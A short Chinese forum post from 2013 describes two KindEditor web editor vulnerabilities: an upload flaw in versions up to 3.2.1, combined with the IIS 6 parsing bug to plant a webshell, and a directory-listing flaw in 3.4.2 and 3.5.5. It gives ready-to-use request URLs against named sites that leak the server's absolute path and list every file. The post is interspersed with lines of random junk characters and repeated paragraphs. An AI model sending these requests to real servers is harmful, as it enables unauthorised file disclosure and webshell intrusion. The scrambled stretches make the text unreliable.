KindEditor上传解析漏洞 影响版本:= kindeditor 3.2.1(09年8月份发布的最新版) 漏洞利用:利用windows 2003 IIS解析漏洞拿WEBSHELL KindEditor列目录漏洞 测试版本:KindEditor 3.4.2 KindEditor 3.5.5 1.http://www.political-security.com/67cms/kindeditor/php/file_man
' u+ D. Z0 G& s' l+ \8 s) }8 K* Q3 t( [0 g3 P$ |. l2 [
KindEditor上传解析漏洞 影响版本:<= kindeditor 3.2.1(09年8月份发布的最新版) 漏洞利用:利用windows 2003 IIS解析漏洞拿WEBSHELL 2 m) i6 O; |' q" Q3 H7 J
& B v8 ]5 I. @, D8 g' |
KindEditor列目录漏洞 测试版本:KindEditor 3.4.2 KindEditor 3.5.5 - http://www.political-security.com/67cms/kindeditor/php/file_manager_json.php?path=/
- //path=/,爆出绝对路径D:AppServwww67cmskindeditorphpfile_manager_json.php
- 2.http://netknight.in/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
- //根据爆出的绝对路径,修改path的值为AppServ/www/67cms/
- 这时将遍历d:/AppServ/www/67cms/下的所有文件和文件名
% ^2 \6 J0 H" R9 w
9 N3 C. D1 }/ h% v4 E; X/ ^& Y4 ]6 ~+ U) w) o
# _7 Y4 l5 u5 y, E6 K o* Z
8 s, d3 S' U( z/ A8 C
2 P ~; W! O2 J' w4 y |
发表于 2013-1-23 09:16:19
收藏
支持
反对